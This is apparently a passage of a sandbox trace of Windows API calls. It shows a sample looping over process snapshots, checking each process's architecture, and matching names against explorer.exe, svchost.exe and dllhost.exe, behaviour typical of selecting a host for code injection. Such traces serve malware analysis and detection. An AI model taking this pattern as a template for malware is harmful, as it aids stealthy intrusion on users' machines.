[0209.658] CloseHandle (hObject=0xd8) returned 1 [0209.658] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0209.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0209.659] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0209.659] CloseHandle (hObject=0xd8) returned 1 [0209.659] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0209.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0209.660] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0209.660] CloseHandle (hObject=0xd8) returned 1 [0209.660] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0209.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0209.660] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0209.660] CloseHandle (hObject=0xd8) returned 1 [0209.660] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0209.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0209.661] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0209.661] CloseHandle (hObject=0xd8) returned 1 [0209.661] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0209.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0209.661] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0209.661] CloseHandle (hObject=0xd8) returned 1 [0209.661] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0209.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0209.662] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0209.662] CloseHandle (hObject=0xd8) returned 1 [0209.662] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0209.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0209.663] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0209.663] CloseHandle (hObject=0xd8) returned 1 [0209.663] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0209.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0209.663] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0209.663] CloseHandle (hObject=0xd8) returned 1 [0209.663] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0209.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0209.664] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0209.664] CloseHandle (hObject=0xd8) returned 1 [0209.664] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0209.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0209.664] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0209.664] CloseHandle (hObject=0xd8) returned 1 [0209.665] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0209.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0209.665] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0209.665] CloseHandle (hObject=0xd8) returned 1 [0209.665] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0209.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0209.666] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0209.666] CloseHandle (hObject=0xd8) returned 1 [0209.666] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0209.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0209.666] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0209.666] CloseHandle (hObject=0xd8) returned 1 [0209.666] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0209.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0209.667] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0209.667] CloseHandle (hObject=0xd8) returned 1 [0209.667] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0209.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0209.667] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0209.667] CloseHandle (hObject=0xd8) returned 1 [0209.668] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0209.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0209.668] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0209.668] CloseHandle (hObject=0xd8) returned 1 [0209.668] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0209.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0209.669] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0209.669] CloseHandle (hObject=0xd8) returned 1 [0209.669] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0209.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0209.669] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0209.669] CloseHandle (hObject=0xd8) returned 1 [0209.669] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0209.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0209.670] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0209.670] CloseHandle (hObject=0xd8) returned 1 [0209.670] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0209.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0209.670] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0209.670] CloseHandle (hObject=0xd8) returned 1 [0209.671] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0209.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0209.671] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0209.672] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0209.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0209.672] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0209.673] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0209.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0209.673] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0209.674] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0209.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0209.674] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0209.674] CloseHandle (hObject=0xd8) returned 1 [0209.674] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0209.674] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0209.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0209.675] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0209.675] CloseHandle (hObject=0xd8) returned 1 [0209.675] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0209.675] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0209.675] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0209.675] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0209.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0209.676] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0209.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0209.676] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0209.676] CloseHandle (hObject=0xd8) returned 1 [0209.676] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0209.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0209.677] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0209.677] CloseHandle (hObject=0xd8) returned 1 [0209.677] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0209.677] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0209.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0209.677] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0209.677] CloseHandle (hObject=0xd8) returned 1 [0209.677] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0209.678] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0209.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0209.678] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0209.678] CloseHandle (hObject=0xd8) returned 1 [0209.678] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0209.747] CloseHandle (hObject=0xd4) returned 1 [0209.748] Sleep (dwMilliseconds=0x3e8) [0210.750] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0210.753] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0210.753] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0210.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0210.754] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0210.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0210.754] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0210.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0210.755] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0210.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0210.755] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0210.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0210.756] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0210.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0210.756] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0210.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0210.757] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0210.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0210.757] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0210.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0210.758] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0210.758] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0210.759] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0210.759] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0210.760] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0210.760] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0210.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0210.761] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0210.761] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0210.762] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: 